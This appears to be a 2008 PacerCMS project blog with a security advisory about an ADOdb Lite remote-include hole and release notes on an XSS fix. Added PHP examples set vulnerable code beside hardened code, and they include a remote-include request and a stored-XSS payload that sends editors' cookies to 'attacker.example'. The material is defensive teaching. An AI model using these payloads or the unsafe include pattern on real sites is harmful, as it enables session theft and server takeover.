Posted in Development Notes, Site News, Tips & Tutorials on February 20, 2008
A vulnerability has been discovered in the ADOdb Lite package that PacerCMS uses to interact with the database; it could allow an attacker to execute arbitrary PHP on your server. Please remove the following file from your install, as the software makes little use of its functionality at this time.
./includes/adodb_lite/adodb-perf-module.inc.php
For an attacker to exploit this, register_globals would have to be enabled in the PHP installation at your Web host. With register_globals on, PHP turns every request parameter (query string, form field, cookie) into a global variable before the script runs, so a script that assumes a variable was set internally can instead have it set from a URL. Most modern hosts disable this feature by default, but some (including GoDaddy) leave it enabled for backwards compatibility. Further reading:
http://php.net/register_globals
Again, please take a moment to remove the specified file from your installations even if you do not have register_globals enabled. The problem has been reported to the developer of ADOdb Lite, but a patched version is not yet available.
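The following is an added illustration of the failure mode register_globals creates and of a check you can run on your host. It is not the ADOdb Lite or PacerCMS code; the variable name $module and the driver file names in the allow-list are assumptions made for the example. (register_globals was removed entirely in PHP 5.4; the pattern below applies to the PHP 4/5.x hosts of the time.)

```php
<?php
// Added illustration, not ADOdb Lite or PacerCMS code. $module and the
// adodb-*.inc.php names below are assumed for the example.

// 1. The failure mode register_globals enables (PHP <= 5.3).
//    With register_globals=On, a request such as
//        ?module=http://attacker.example/payload
//    defines $module before any line of this file runs. If allow_url_include
//    (or allow_url_fopen on older PHP) is also on, the include fetches the
//    attacker's file; if not, a local path on the server still works.
function load_module_unsafe()
{
    global $module;                         // never initialised here; the script assumes a caller set it
    if (isset($module)) {
        include $module . '.inc.php';       // attacker-controlled include path
    }
}

// 2. Hardened form: read input only from the request array you were handed,
//    map it through an allow-list, and never build an include path from the raw value.
function load_module_safe(array $request)
{
    $allowed = array(                       // assumed driver file names
        'mysql' => 'adodb-mysql.inc.php',
        'pgsql' => 'adodb-pgsql.inc.php',
    );
    $name = isset($request['module']) ? (string) $request['module'] : '';
    if (!isset($allowed[$name])) {
        return false;                       // unknown driver: refuse rather than guess
    }
    $path = dirname(__FILE__) . '/' . $allowed[$name];
    if (!is_file($path)) {
        return false;
    }
    include $path;
    return true;
}

// 3. Host check. Run this once (php -r, or a throw-away page you delete afterwards)
//    to see whether the directive is on for your account.
function register_globals_enabled()
{
    return (bool) ini_get('register_globals');
}

if (register_globals_enabled()) {
    echo "register_globals is ON: disable it before relying on any PHP application on this host\n";
} else {
    echo "register_globals is off\n";
}
```

If the check reports the directive on and your host runs Apache with mod_php, `php_flag register_globals off` in the site's .htaccess turns it off per directory; otherwise set `register_globals = Off` in php.ini (or ask your host to). Removing adodb-perf-module.inc.php is still the right move either way, since it closes the issue regardless of the host's configuration.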
Running an online newspaper or magazine may bring some unwelcome attention from those seeking to exploit vulnerabilities in PacerCMS. We have received a great deal more traffic lately as a result of the previous vulnerability and a few other minor issues that would affect only a very small percentage of Web hosts. With that in mind, realize that your site is always in an attacker's crosshairs, because he or she can draw a great deal of attention by defacing or disabling your Web site. If you come across a site outlining a vulnerability in the software, please let us know (by direct e-mail) so that we may act quickly.
Posted in Development Notes, Releases on February 4, 2008
There is an issue with 0.6.1 that may cause a minor nuisance when adding or updating items in the database on some hosts. If you recently upgraded, here are the files you need to bring your install current.
- includes/cm-header.php
- siteadmin/article-browse.php
- siteadmin/article-edit.php
- siteadmin/article-media.php
- siteadmin/cm-includes/cm-header.php
- siteadmin/issue-browse.php
- siteadmin/issue-edit.php
- siteadmin/page-edit.php
- siteadmin/poll-edit.php
- siteadmin/profile.php
- siteadmin/section-edit.php
- siteadmin/settings.php
- siteadmin/staff-access.php
- siteadmin/staff-edit.php
- siteadmin/submitted-browse.php
- siteadmin/submitted-edit.php
This Release (Subversion R104):
- Fixes an evaluation error on many hosts
- Plugs a minor file include risk if the configuration file is missing
Download PacerCMS 0.6.2
Posted in Releases on January 21, 2008
We are proud to announce the next release of PacerCMS, 0.6.1. This release is aimed at developers looking to extend the back-end Site Administrator panel: the functions and processes that go into publishing stories and managing users and sections are now better documented. We have also cut down the number of database queries required for routine tasks through better session management.
While this version adds no significant features for the average user beyond a few bug fixes, it is recommended for all users. Our friends at RawSecurity.org have outlined a few problems in the public content submission module (./submit.php) that could conceivably let a malicious visitor obtain access rights through cross-site scripting (XSS). Even if you cannot process a full update right now, please replace your existing submit.php with the version found in our Subversion repository. While we cannot guarantee that a site running PacerCMS will be safe from people with malicious intent, we do take security issues seriously.
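The following is an added illustration of how XSS in a public submission form turns into an access-rights problem: a visitor's submission is stored and later rendered to an editor inside the Site Administrator, so a script payload runs with the editor's session. It is not the PacerCMS submit.php or its fix; the field names and the sample row are constructed for the example.

```php
<?php
// Added illustration, not PacerCMS code. Field names and the sample row are constructed.

// Vulnerable: the submission is echoed to the editor exactly as the visitor typed it.
// A payload in 'body' such as
//     <script>document.location='http://attacker.example/?c='+document.cookie</script>
// executes in the editor's browser, with the editor's logged-in session.
function render_submission_unsafe(array $row)
{
    return '<h2>' . $row['headline'] . '</h2><p>' . $row['body'] . '</p>';
}

// Hardened: encode every value that did not originate in the code itself, at output
// time, for the HTML context it lands in. ENT_QUOTES also neutralises quotes that
// would otherwise break out of an attribute.
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

function render_submission_safe(array $row)
{
    return '<h2>' . h($row['headline']) . '</h2><p>' . nl2br(h($row['body'])) . '</p>';
}

// Constructed sample standing in for a row read back from the submissions table.
$sample = array(
    'headline' => 'Campus news',
    'body'     => "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
);

echo render_submission_unsafe($sample), "\n"; // script tag reaches the editor's browser intact
echo render_submission_safe($sample), "\n";   // shown as &lt;script&gt;... text, never executed
```

Output encoding is the fix; input filtering alone misses payloads that only become dangerous in a particular context. Marking the session cookie HttpOnly (session.cookie_httponly in PHP 5.2+) limits cookie theft but not what a script can do on the editor's behalf while the page is open, so it complements escaping rather than replacing it.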
This Release (R101)
- Streamlined code base in Site Administrator
- Adoption of phpDoc.org code commenting
- Security release
- Various bug fixes and minor enhancements from the Developer’s List
Download PacerCMS 0.6.1